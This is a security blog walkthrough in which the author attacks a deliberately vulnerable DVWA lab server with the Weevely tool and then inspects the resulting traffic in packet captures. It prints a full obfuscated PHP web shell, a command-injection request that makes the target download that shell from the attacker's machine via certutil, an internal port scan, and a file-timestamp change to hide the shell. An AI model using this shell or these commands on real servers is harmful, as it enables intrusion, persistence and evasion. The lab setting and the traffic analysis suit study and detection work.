In the previous post, I took the opportunity to get a better understanding of web shells. In this post, I'm leveraging a Weevely, which is part of Kali. There are a lots of other shells such as China Chopper, C99, etc. However, I choose Weevely just out of pure curiosity.
First generate the .php file named webshell.php and a password of "SecurityNik"
┌──(rootđź’€securitynik)-[~] └─# weevely generate SecurityNik webshell.php Generated 'webshell.php' with password 'SecurityNik' of 764 byte size.
With this generated, taking a look at the code
┌──(rootđź’€securitynik)-[~] └─# cat webshell.php <?php $E=';for($i[%=0;$i<$[%l[%;){[%for($j=0;([%[%$j<$[%c&&$i<$l);$j++,$i+[%+){$[%o[%.=$t{'; $M='ean();$r=@base[%64[%[%_encode(@x(@gzco[%m[%press($o),$k[%));[%pri[%nt("$p$kh$r[%$kf");}'; $U='$k="[%e4f7[%fb[%5b";$kh="d597f2a[%3139[%[%9";$kf="499ce2[%29[%74f7";$p="Q[%Kdl0d[%L[%yL'; $p='[%et_[%con[%tents("[%php://inpu[%t"),$m)==1) {@ob_s[%tar[%t();@ev[%al(@gzu[%ncomp[%ress('; $b='@x[%(@base6[%4_dec[%od[%e($[%m[1]),$k[%)));$o=[%@[%ob_get_contents()[%;[%@ob_end[%_[%cl'; $l='rgdCYf[%Q";fu[%nction x($[%t,[%$[%k){$c=strlen($k)[%;[%$l=st[%r[%len[%($t);$o=""'; $B=str_replace('C','','crCCeCaCtCe_fCunction'); $J='$[%i}^$k{$j};}[%}re[%turn[% $o;}i[%f (@preg_m[%atc[%h([%"/$k[%h(.+[%)$kf/[%",@file_g'; $u=str_replace('[%','',$U.$l.$E.$J.$p.$b.$M); $q=$B('',$u);$q(); ?>
Next, need to get the file to the system. Leveraging the command injection from before to upload the file.
Hosting a web server on my attacking machine
┌──(rootđź’€securitynik)-[~] └─# python -m SimpleHTTPServer 443 Serving HTTP on 0.0.0.0 port 443 ...
Executing curl command and reviewing the results ...
┌──(rootđź’€securitynik)-[~] └─# curl --cookie "security=low; PHPSESSID=knc6aiujikoks8f5vqtuc98uc9" --data "ip=127.0.0.1+%26%26+certutil+-URLcache+-f+http%3A%2F%2F10.0.0.101:443%2Fwebshell.php+main.php+%26%26+dir+main.php&Submit=Submit" --request POST 'http://10.0.0.110/dvwa/vulnerabilities/exec/' ... Pinging 127.0.0.1 with 32 bytes of data: Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 ... Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ... CertUtil: -URLCache command completed successfully. Volume in drive C has no label. Volume Serial Number is 6C10-15EA Directory of C:\xampp\htdocs\DVWA\vulnerabilities\exec 09/04/2021 12:01 PM 764 main.php 1 File(s) 764 bytes 0 Dir(s) 20,947,238,912 bytes free
With te file uploaded, time to leverage Weevely.
┌──(rootđź’€securitynik)-[~] └─# weevely http://10.0.0.110/dvwa/vulnerabilities/exec/main.php SecurityNik [+] weevely 4.0.1 [+] Target: 10.0.0.110 [+] Session: /home/securitynik/.weevely/sessions/10.0.0.110/main_0.session [+] Browse the filesystem or execute commands starts the connection [+] to the target. Type :help for more information. weevely>
Now that the Weevely environment is available, time to leverage some of its features.
SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ :system_info +--------------------+---------------------------------------------------------------+ | document_root | C:/xampp/htdocs | | whoami | | | hostname | SECURITYNIK-WIN10 | | pwd | C:\xampp\htdocs\DVWA\vulnerabilities\exec | | open_basedir | | | safe_mode | False | | script | /dvwa/vulnerabilities/exec/main.php | | script_folder | C:\xampp\htdocs\DVWA\vulnerabilities\exec | | uname | Windows NT SECURITYNIK-WIN 10.0 build 18363 (Windows 10) i586 | | os | Windows NT | | client_ip | 10.0.0.101 | | max_execution_time | 30 | | php_self | /dvwa/vulnerabilities/exec/main.php | | dir_sep | \ | | php_version | 7.2.1 | +--------------------+---------------------------------------------------------------+ SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ ipconfig Windows IP Configuration Ethernet adapter Ethernet: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::a049:348c:1e6b:6497%9 IPv4 Address. . . . . . . . . . . : 10.0.0.110 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.0.0.109
Performing internal reconnaissance via a port scan on 4 different hosts, looking for a couple of common ports.
SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ :net_scan 10.0.0.1,10.0.0.2,10.0.0.101,10.0.0.110 22,80,443,445,8000,9997 Scanning addresses 10.0.0.1-10.0.0.110:22-8000 Scanning addresses 10.0.0.1-10.0.0.110:9997-9997 +------------------+ |.0.0.101:22 |10.0.0.101:8000 |.0.0.110:80 |0.0.0.110:443 |0.0.0.110:445 |10.0.0.101:9997
Changing the date and time on the "main.php" file to blend in with the index.php.
First get the dates and times for the files.
SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ dir ... 02/05/2018 02:45 AM 1,830 index.php 09/04/2021 12:01 PM 764 main.php ...
Modifying and confirming the timestamp on the file
SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ :file_touch -human-ts "2018-02-05 01:45 AM" main.php New timestamp: 2018-02-05 02:45:00 SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ dir ... 02/05/2018 02:45 AM 1,830 index.php 02/05/2018 02:45 AM 764 main.php ...
I'm going to leave the rest of the commands at this time, as it seems most of them are for Linux based web servers. I can be wrong.
Looking at Weevley activity from the perspective of the packets.
First up, what User-Agents did Weevley use?
┌──(rootđź’€securitynik)-[~] └─# tshark -n -r weevley.pcap -T fields -e http.user_agent | sort | uniq Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412
We could have also looked into our "access.log" file to get that answer.
Following the stream 0, looking at the payload we see ...
┌──(rootđź’€securitynik)-[~]
└─# tshark -n -r weevley.pcap -q -z follow,tcp,ascii,0
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 10.0.0.101:40922
Node 1: 10.0.0.110:80
291
POST /dvwa/vulnerabilities/exec/main.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Host: 10.0.0.110
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412
Connection: close
83
A/'Sc(awS|cu$J^cd597f2a31399Hagteqiq4lJQBlcFsdYzYnLpZQc499ce22974f7nS.yn=#|-5>K)[Oi
276
HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 00:28:29 GMT
Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1
X-Powered-By: PHP/7.2.1
Content-Length: 60
Connection: close
Content-Type: text/html; charset=UTF-8
QKdl0dLyLrgdCYfQd597f2a31399HahVAlRTB2VlN2s2Yw==499ce22974f7
===================================================================
While there is nothing that really stands out in the request, I have to ask what is "A/'Sc(awS|cu$J^cd597f2a31399Hagteqiq4lJQBlcFsdYzYnLpZQc499ce22974f7nS.yn=#|-5>K)[Oi" and "QKdl0dLyLrgdCYfQd597f2a31399HahVAlRTB2VlN2s2Yw==499ce22974f7" in the response? Those definitely do not look like normal responses to web requests.
Looking at other streams, I see something much similar to the first stream. Here is stream 3.
┌──(rootđź’€securitynik)-[~]
└─# tshark -n -r weevley.pcap -q -z follow,tcp,ascii,3
===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 3
Node 0: 10.0.0.101:40928
Node 1: 10.0.0.110:80
292
POST /dvwa/vulnerabilities/exec/main.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Content-Length: 227
Host: 10.0.0.110
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412
Connection: close
227
A/'Sc(awS|cu$J^cd597f2a31399HahD+1tp91J1tIeIdFitWsxBzRfwWI1bcUBfpxxb2SOW9UPtnI042tsbWg88dJbZY6Kn8m4Bg2N2qAnAcFzaq/Y4KaleURDC4GTJOEFwPJB1vicFnfXs9POKT6RVeKg3/nozcjO69a67sl/2GY1e2iPGG0jnKOClsJoOCGf1GFA499ce22974f7nS.yn=#|-5>K)[Oi
325
HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 00:28:29 GMT
Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1
X-Powered-By: PHP/7.2.1
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8
QKdl0dLyLrgdCYfd597f2a31399Haht/i43HcxJGi/6Myp7rq7/SWYuqfkpNBxnPcEH02KAPjSkVbEHMTbAHo5mDlBtGA==499ce22974f7
===================================================================
What does the content in the response mean? Time for me to look at the video "Hunting and Dissecting the Weevely Web Shell - Threat Hunting Summit 2016" with Kiel Wadner.
References:
No comments:
Post a Comment